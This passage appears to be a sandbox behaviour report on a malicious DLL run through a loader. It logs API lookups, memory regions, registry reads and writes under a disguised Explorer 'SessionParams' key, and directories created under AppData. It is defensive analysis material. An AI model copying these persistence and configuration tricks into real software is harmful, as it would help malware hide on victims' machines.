| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:28 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 98358 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #59: gorctexxzx.exe
150
0
| Information | Value |
|---|---|
| ID | #59 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomT /fn_args="iexplore.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd48 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D4C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x002a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00560fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0065ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x007effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x007cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x007effff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (32)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
6 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Timout, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IsActive, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = BSlp, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = SDCnt, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Id, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = EmtParam, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IListLen, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IList, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Installed, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastId, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = NTries, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IMValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LCValue, data = 0, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 7200, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 100, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:28 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 98452 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #60: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #60 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllCanUnloadNow /fn_args="iexplore.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd5c |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D60
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0047ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00547fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x00650fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0087ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
